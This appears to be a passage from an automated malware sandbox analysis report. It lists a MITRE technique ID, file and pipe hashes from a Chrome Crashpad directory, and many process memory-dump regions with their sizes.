                                                                                                                                                                                  Web Service

                                                                                                                                                                                  1
                                                                                                                                                                                  T1102

                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                  Downloads

                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    1467cdab69e4cb8b7d575ac2c8d07743

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    26b1022eb5ae5a876b5f4a8d1d3d956336040e42

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    73e2ad7bf7aed03d4cc32446d4a3a25d03832d7f8fb73bf728533f03d4dd9d17

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    6f0f4a820929906bebe53b6222c87dabe775955fc13725f6df0e3f2e4ddadb338cb69bfbe6b21509e95ea03db2d89e6c44fdbc223b3731e7b1e0abff9bf70eef

                                                                                                                                                                                  • \??\pipe\crashpad_1040_HTMPMUVGOFNDWTOB
                                                                                                                                                                                    MD5

                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                  • \??\pipe\crashpad_5044_RKSINBEBDAOBQZFK
                                                                                                                                                                                    MD5

                                                                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                  • memory/196-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/196-123-0x00007FFC78450000-0x00007FFC78451000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/296-304-0x0000028566F40000-0x0000028566FA7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/296-273-0x00000285668D0000-0x0000028566937000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/352-271-0x0000022296760000-0x00000222967C7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/852-279-0x0000000010000000-0x0000000010188000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.5MB

                                                                                                                                                                                  • memory/852-278-0x0000000004910000-0x0000000004A52000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.3MB

                                                                                                                                                                                  • memory/1088-256-0x0000012A8AC90000-0x0000012A8ACF7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1088-302-0x0000012A8B2B0000-0x0000012A8B317000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1216-264-0x000001CC1B480000-0x000001CC1B4E7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1292-274-0x000001DB90AD0000-0x000001DB90B37000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1304-288-0x00000000054E0000-0x00000000054E1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/1360-267-0x0000023AC3390000-0x0000023AC33F7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1360-247-0x0000023AC32D0000-0x0000023AC3314000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    272KB

                                                                                                                                                                                  • memory/1448-306-0x00000234832B0000-0x0000023483317000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1448-258-0x0000023482C40000-0x0000023482CA7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1688-291-0x00000000057E0000-0x0000000005CDE000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    5.0MB

                                                                                                                                                                                  • memory/1900-308-0x00000236FF7B0000-0x00000236FF817000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1900-261-0x00000236FF230000-0x00000236FF297000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/1968-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/2212-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/2308-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/2536-298-0x00000273A7270000-0x00000273A72D7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2536-253-0x00000273A7010000-0x00000273A7077000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2572-272-0x0000018CA98A0000-0x0000018CA9907000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2572-300-0x0000018CA9E40000-0x0000018CA9EA7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2580-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/2584-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/2748-296-0x000001D431960000-0x000001D4319C7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2748-250-0x000001D431880000-0x000001D4318E7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2800-275-0x00000287E7EA0000-0x00000287E7F07000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2820-266-0x000001BDD4D40000-0x000001BDD4DA7000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/2972-290-0x0000000004B40000-0x0000000004B41000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/3340-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/3748-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/3788-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/3960-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4112-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4120-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4124-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4144-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4164-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4188-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4208-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4236-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4260-245-0x0000000002770000-0x000000000290C000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.6MB

                                                                                                                                                                                  • memory/4280-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4356-294-0x0000000004F20000-0x0000000005526000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    6.0MB

                                                                                                                                                                                  • memory/4420-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4472-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4496-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4556-292-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4580-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4672-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4704-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4720-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4732-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4744-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4752-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4760-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4776-270-0x0000029B51F00000-0x0000029B51F67000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    412KB

                                                                                                                                                                                  • memory/4776-285-0x0000029B54400000-0x0000029B54505000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.0MB

                                                                                                                                                                                  • memory/4808-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4812-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4832-282-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    284KB

                                                                                                                                                                                  • memory/4844-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4864-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4868-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4884-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4896-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4900-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4912-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4948-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4956-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4964-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4972-248-0x00000000012B0000-0x0000000001306000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    344KB

                                                                                                                                                                                  • memory/4972-246-0x0000000000C70000-0x0000000000CAA000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    232KB

                                                                                                                                                                                  • memory/4972-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4984-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4984-287-0x0000000000DD0000-0x0000000000DD2000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    8KB

                                                                                                                                                                                  • memory/5008-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5024-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5032-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5044-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5056-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5088-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5100-276-0x00000000005B0000-0x00000000006FA000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.3MB

                                                                                                                                                                                  • memory/5100-277-0x0000000000400000-0x00000000004B3000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    716KB

                                                                                                                                                                                  • memory/5124-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5192-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5256-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5320-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5388-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5432-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5476-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5492-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5600-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5636-281-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    284KB

                                                                                                                                                                                  • memory/5644-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5688-289-0x0000000005130000-0x0000000005131000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/5696-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5724-280-0x0000000000490000-0x00000000005DA000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.3MB

                                                                                                                                                                                  • memory/5748-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5796-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5804-286-0x000001D5D1CA0000-0x000001D5D1CC0000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    128KB

                                                                                                                                                                                  • memory/5804-293-0x000001D5D1F60000-0x000001D5D1F80000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    128KB

                                                                                                                                                                                  • memory/5804-283-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    7.0MB

                                                                                                                                                                                  • memory/5828-284-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    3.5MB

                                                                                                                                                                                  • memory/5916-244-0x0000000000000000-mapping.dmp